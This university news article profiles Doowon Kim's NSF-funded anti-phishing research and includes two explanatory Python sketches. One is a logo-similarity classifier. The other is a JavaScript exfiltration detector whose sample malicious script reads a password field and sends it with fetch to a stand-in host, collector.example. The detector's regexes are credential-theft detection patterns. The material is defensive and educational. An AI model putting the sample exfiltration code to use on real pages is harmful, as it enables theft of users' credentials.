Several years ago, an elderly gentleman came to Doowon Kim with a problem: he had lost approximately $30,000 after falling prey to a phishing scheme, which tricked him into submitting his personal information to a malicious website that appeared to be legitimate.

Unfortunately, Kim couldn’t recover the man’s money. But as a computer scientist focusing on cybersecurity, Kim knew there was something he could do: improve anti-phishing tools to help protect others from experiencing the same kind of loss.

Kim, an assistant professor in the Min H. Kao Department of Electrical Engineering and Computer Science, has received a National Science Foundation CAREER Award of $597,147 to support his five-year project studying ways to strengthen measures designed to protect against phishing attacks.

“Phishing attacks represent a major cybersecurity threat affecting billions of Internet users worldwide. These attacks involve cybercriminals fabricating websites to look like legitimate ones, to trick users into revealing sensitive information such as login credentials or Social Security numbers,” Kim said.

Phishing schemes are used not only to steal individuals’ financial and private information. They can also wreak havoc on businesses and even be used to penetrate government systems behind firewalls, putting national security at risk.

Introducing Novel Approaches

To strengthen their efforts to understand and counter these attacks, researchers have started using machine learning and deep learning. Using “reference-based visual similarity models,” these tools analyze visual elements, including logos, website layouts, and log-in forms, to distinguish between legitimate sites and phishing sites.
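For readers curious how a reference-based comparison might work in principle, here is a deliberately simplified sketch. It is not Kim's method or any production detector: real systems use deep learning models on full screenshots, while this toy version compares tiny grayscale logos with an average hash. The names `average_hash`, `classify`, and `REFERENCES`, the sample pixel grids, and the `.example` domains are all hypothetical.

```python
from typing import Dict, List, Tuple

Image = List[List[int]]  # grayscale pixel grid, values 0-255


def average_hash(img: Image) -> List[int]:
    """Return one bit per pixel: 1 if the pixel is brighter than the image mean."""
    pixels = [p for row in img for p in row]
    mean = sum(pixels) / len(pixels)
    return [1 if p > mean else 0 for p in pixels]


def hamming(a: List[int], b: List[int]) -> int:
    """Count the positions where two equal-length bit lists differ."""
    return sum(x != y for x, y in zip(a, b))


def classify(logo: Image, domain: str,
             references: Dict[str, Tuple[Image, str]],
             max_distance: int = 2) -> str:
    """Compare a page's logo against known brand logos (the 'references').

    If the logo looks like a known brand but the page is served from a
    different domain, treat the page as a likely phishing site.
    """
    logo_hash = average_hash(logo)
    for _brand, (ref_logo, legit_domain) in references.items():
        if hamming(logo_hash, average_hash(ref_logo)) <= max_distance:
            return "legitimate" if domain == legit_domain else "phishing"
    return "unknown"  # no reference brand resembles this logo


# Hypothetical 4x4 reference logo for a made-up brand.
REF_LOGO: Image = [
    [255, 255, 0, 0],
    [255, 255, 0, 0],
    [0, 0, 255, 255],
    [0, 0, 255, 255],
]
REFERENCES = {"examplebank": (REF_LOGO, "examplebank.example")}

# A near copy of the logo hosted on a look-alike domain.
COPIED_LOGO: Image = [
    [250, 240, 10, 5],
    [245, 250, 0, 12],
    [8, 0, 251, 249],
    [3, 15, 255, 240],
]
# The same logo with its colors inverted, a strong visual modification.
INVERTED_LOGO: Image = [[255 - p for p in row] for row in REF_LOGO]

print(classify(COPIED_LOGO, "examp1ebank.example", REFERENCES))
print(classify(REF_LOGO, "examplebank.example", REFERENCES))
print(classify(INVERTED_LOGO, "examp1ebank.example", REFERENCES))
```

In this toy setup the near copy on the look-alike domain is flagged, the genuine site passes, and the inverted logo matches no reference at all, so it comes back as "unknown."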

But Kim sees two problems with current anti-phishing efforts.

First, they are not resilient against evolving attack tactics. Machine learning models can only recognize elements that have been learned or previously encountered. Phishing campaigns can circumvent detection when attackers make strategic modifications to key visual elements, such as capitalizing logos or deliberately blurring branding on their fraudulent websites.

Second, current detection frameworks require extensive human intervention to identify new vulnerabilities, curate ground-truth datasets, retrain models, and validate updated classifiers. This maintenance cycle creates windows of vulnerability when detection systems are susceptible to sophisticated phishing campaigns that exploit these defensive gaps.

“We propose novel approaches that can systematically understand the current anti-phishing ecosystem and counter ever-evolving phishing attacks,” Kim said.



After evaluating state-of-the-art detection models, Kim and his team of graduate students will work on two new types of detection mechanisms.

“We aim to address the inherent limitations of phishing detection systems that rely heavily on rendered visual elements, by focusing on typically unexposed program elements, such as unexecuted JavaScript code,” Kim said. “This can enhance the robustness and resilience of phishing detection mechanisms against evolving cyber threats.”

Kim likened the work to viewing a theatrical production. Rather than just looking at the actors on the stage (the logo, log-in page, or other visual elements), he plans to study what’s going on behind the scenes (the JavaScript) to find how the legitimate site differs from the bogus site and to pinpoint the portions of the code that “steal” a user’s credentials and forward that information elsewhere.
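As a rough illustration of what looking “behind the scenes” could involve, the sketch below scans a page's JavaScript source, without running it, for code that reads a credential field and then sends data to a different host. This is only an assumption about the general idea, not the project's actual technique: the regular expressions are crude heuristics, and the function name `find_exfiltration`, the sample script, and the `.example` hosts are hypothetical.

```python
import re
from typing import List
from urllib.parse import urlparse

# Heuristic: code that reads the value of a field whose selector mentions
# a credential-like word (password, pwd, login, user).
CREDENTIAL_READ = re.compile(
    r"""(?:getElementById|querySelector)\(\s*['"][^'"]*(?:pass|pwd|login|user)[^'"]*['"]\s*\)\.value""",
    re.IGNORECASE,
)

# Heuristic: a network call whose first argument is a literal absolute URL.
NETWORK_SEND = re.compile(
    r"""(?:fetch|navigator\.sendBeacon)\(\s*['"](https?://[^'"]+)['"]"""
)


def find_exfiltration(js_source: str, page_host: str) -> List[str]:
    """Return hosts other than page_host that the script sends data to,
    but only if the script also reads a credential-like form field."""
    if not CREDENTIAL_READ.search(js_source):
        return []
    suspicious_hosts = []
    for match in NETWORK_SEND.finditer(js_source):
        host = urlparse(match.group(1)).hostname
        if host and host != page_host:
            suspicious_hosts.append(host)
    return suspicious_hosts


# Hypothetical script from a fake log-in page.
SUSPICIOUS_JS = """
function submitForm() {
  var pw = document.getElementById('password').value;
  fetch('https://collector.example/steal', {method: 'POST', body: pw});
}
"""

# Hypothetical script that posts the same field back to its own host.
BENIGN_JS = """
function submitForm() {
  var pw = document.getElementById('password').value;
  fetch('https://login.examplebank.example/session', {method: 'POST', body: pw});
}
"""

print(find_exfiltration(SUSPICIOUS_JS, "login.examplebank.example"))
print(find_exfiltration(BENIGN_JS, "login.examplebank.example"))
```

Pattern matching like this is easy to evade with obfuscated or dynamically built code, which is one reason a research effort would need far more robust program analysis than this sketch shows.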

Kim also said, “We aim to reduce intensive human efforts required to update defensive models against emerging attacks, using large language models (LLMs).” LLMs are AI models trained on enormous datasets so they can understand and generate human-like text.

“This aims to narrow the critical time gap between the emergence of new threats and the deployment of updated models,” Kim said.

Kim said some corporations, including Amazon, ReversingLabs, and Accenture Labs, are interested in incorporating his ideas into their anti-phishing programs. Kim’s research will be publicly accessible to future researchers and will be integrated into computer science education programs.

Kim, who has been at UT since August 2020, teaches Human Factors in Cybersecurity, Introduction to Cybersecurity, Software Security, and Large Language Models for Cybersecurity.